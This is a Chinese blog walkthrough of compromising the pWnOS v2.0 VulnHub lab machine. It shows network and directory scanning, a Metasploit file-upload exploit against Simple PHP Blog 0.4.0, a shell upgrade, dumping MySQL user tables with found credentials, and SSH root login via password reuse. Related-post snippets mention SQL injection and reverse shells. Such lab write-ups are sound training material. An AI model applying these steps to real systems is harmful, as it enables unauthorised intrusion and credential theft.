vulnhub pWnOS v2.0通关

于 2024-03-30 13:24:53 发布
阅读量564 收藏 9
点赞数 4
文章标签: 靶机通关 vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/137170004
版权

 知识点总结:

1.通过模块来寻找漏洞

2.msf查找漏洞

3.通过网站源代码,查看模块信息

环境准备

攻击机:kali2023

靶机:pWnOS v2.0

安装地址:pWnOS: 2.0 (Pre-Release) ~ VulnHub

在安装网址中看到,该靶机静态IP为10.10.10.100

所以我们就要修改虚拟机的"虚拟网络编辑器"

 其次靶机的虚拟机设置如下:

开始渗透!

信息收集

收集IP(虽然已经知道了)

arp-scan -l

 端口扫描

先大概看一下

nmap 10.10.10.100

再详细看一下

nmap -A -p- 10.10.10.100

看到内核版本等

访问一下80端口

扫一下目录

gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt

扫到了/blog目录,访问

查看源代码

查看到建立博客的模块模版是Simple PHP Blog 0.4.0

漏洞查找

msf查找有没有现成的漏洞

search Simple PHP Blog 0.4.0

存在,那我们直接利用

use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog      //填有该模块的url,此处写为uri
run                  //运行
shell                  //开启命令行
python -c 'import pty;pty.spawn("/bin/bash")'  //优化命令行

提权

查看一下目录

存在文件:mysqli_connect.php,看看

拿到数据库root密码,登录

看看能不能拿到相关账户密码,分别执行下述命令爆库

show databases;
use mysql;
show tables;
select * from user;

最后看到

看到root的好多密码都是一致的,具体解密我也不知道,所以没有解密成功!

但是我们可以用上面的那个密码再登录一下ssh试试

ssh root@10.10.10.100

 成功root!

Yf3_te
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pWnOS: 2.0 - linux
战神/calmness的博客
12-28 494
目录 靶机地址 信息收集 Whatweb 查是否是CMS 访问80页面 IsIntS 目录遍历 PHP信息版本 搜索漏洞利用 hydra 爆破web登录页面 尝试错误 爆破:killerbeesareflying 报错注入 输入账户密码登录blog 查看源码 注入读取文件load_file into outfile 函数 命令执行 反弹shell [一] 反弹shell [二] 提权 直接登录成功 (二)查看blog源码 MSF 登录成功 上传php-rev
Vulnhub靶机系列:pWnOS: 2.0
汗的博客
03-30 1552
文章目录靶机地址靶机设置利用知识信息收集并getshell提权 靶机地址 https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 靶机设置 靶机默认设置: IP: 10.10.10.100 Netmask: 255.255.255.0 Gateway: 10.10.10.15 所以攻击机需要在10.10.10.0/24网段 我在虚拟网络编辑器里...
pWnOS 2.0
底层社会中的弱智
04-29 545
目标IP 10.10.10.100 需要把NAT设置改为10.0网段 开放的端口只有两个 22 版本没有可利用漏洞 可以爆破 80 apache暂无可用exp 扫描目录 网页中有两个与数据库进行数据交互的地方 注册和登录 进行sql注入测试 登陆页面存在注入 获取登陆密码 登陆后没有有用的信息 @isints:killerbeesareflying 尝试使用lo...
vulnhub pWnOS_v2.0
n1ght的博客
01-27 172
尝试着去做一些ctf题目和靶机vulnhub的难度还是非常的友好,熟悉一下。这个靶机pWnOS_v2.0还是需要自己配置网络地址的。
PWNOS_ 2.0 (PRE-RELEASE)
qq_57672166的博客
01-04 342
PWNOS_ 2.0 (PRE-RELEASE)
PWNOSv2.0:Desarrollo del CTF PWNOSv2.0
03-06
PWNOSv2.0 Desarrollo del CTF PWNOSv2.0 下载: : 1.配置。 IP地址为10.10.10.100的虚拟虚拟环境配置。 视在实体之间的差异而进行的配置。 2.埃斯卡诺-德波多斯 root@kali:~/PWNOS# nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.100 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-04 21:36 EST Nmap scan report for 10.10.10.100 Host is up (0.00033s
交规学习 考尔快交规 v2.0
10-24
考尔快交规 v2.0 的核心理念在于“技巧答题,快速通关”。这一理念源自对考试规律的深入研究,它摒弃了传统的死记硬背模式,而是通过科学的方法引导用户掌握答题技巧。软件中的多媒体动态教学方式,使得学习过程生动...
WebGoat通关详解.zip
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问题,从基础到高级,...
为创仓储软件下载 为创保税仓储管理软件 v0.8.2.0
10-16
为创仓储软件是一款专为保税仓储管理设计的专业应用,其最新版本为v0.8.2.0。这款软件旨在实现高效、精确的仓储操作,同时整合了报关和财务管理功能,为企业提供全面的解决方案。 在仓储管理方面,为创保税仓储管理...
No.22-VulnHub-pWnOS: 2.0 (Pre-Release)-Walkthrough渗透学习
qq_34801745的博客
01-19 711
** VulnHub-pWnOS: 2.0 (Pre-Release)-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 靶机难度:中级(CTF) 靶机发布日期:2011年7月4日 靶机描述:pWnOS v2.0是一个Virutal机器映像,它托管一个服务器以进行实践渗透测试。它将测试您利用服务器的...
pWnOS v2.0靶机渗透测试流程 儿童版
RemedyVI的博客
07-14 103
本次靶机较简单,通过sql注入上传webshell,获取反弹shell,最后通过敏感文件发现数据库用户名密码,通过ssh登录成功到root。其实/var/www目录下有一个假的敏感文件,账户root密码goodday,但是没办法登录。blog是一个simple php blog,可以通过访问blog目录的index.php查看源代码找到,版本号为0.4.0,也是有SQL注入和命令执行等许多漏洞。
黑客零基础第三章-Web漏洞实战-SQL注入pWnOS: 2.0
ShadowBlade
08-29 1411
第八节内容讲述了文件上传漏洞的利用原理,并在DVWA上进行简单的入侵实验。本节以实战的方式,结合vulnhub靶机pWnOS: 2.0,让大家进一步SQL注入的实际应用场景。
红队打靶:pWnOS2.0打靶思路详解(vulnhub
Bossfrank的博客
06-27 1313
本文详述了vulnhub靶机pWnOS2.0的打靶全过程。靶机难度不高,但渗透的思路清晰,环环相扣。本文打靶涉及SQL注入、searchsploit漏洞利用、不安全的文件上传、敏感信息搜索等等。
pWnOS2.0靶场渗透练习&udf提权&推荐练习靶场&较经典的web渗透靶场&红队靶场
jockerboss的博客
03-12 998
pWnOS2.0靶场练习&udf提权&推荐练习靶场&较经典的web渗透靶场&小白必练
pWnOS v2.0
weixin_44770698的博客
12-07 280
靶机练习
Vulnhub靶机 pwnos v2.0
菜浪马废的博客
04-25 525
先看一下80 ports=$(nmap -p- --min-rate=1000 -sT -T4 10.10.10.100 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports -sT 10.10.10.100 爆破网站目录 找漏洞 发现以上内容 找漏洞 运行脚本 创...
TerAd - 基于stm32的各种数字接口的终端适配器
08-08
TerAd - 基于stm32的各种数字接口的终端适配器
Chrontel_Update_Tool_CH7219A_V03.02.04.rar
最新发布
08-08
Chrontel_Update_Tool_CH7219A_V03.02.04.rar
暑期培训7_2.ipynb
08-08
暑期培训7_2.ipynb
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值